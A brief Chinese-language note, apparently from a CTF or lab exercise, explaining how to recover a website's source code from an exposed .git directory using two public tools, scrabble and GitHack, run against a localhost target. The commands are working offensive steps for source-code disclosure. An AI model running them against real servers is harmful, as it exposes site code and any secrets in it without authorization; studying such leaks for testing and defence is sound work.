这属于一个git源码泄露的问题:
两种方法:
方法1:
git clone https://github.com/denny0223/scrabble
cd scrabble
./ scrabble http://127.0.0.1
........
vim index.html
scrabble是一次性的
方法2:
git clone https://github.com/lijiejie/GitHack
or
git clone https://github.com.cnpmjs.org/lijiejie/GitHack
python GitHack.py http://127.0.0.1/.git
源码就在html文件里面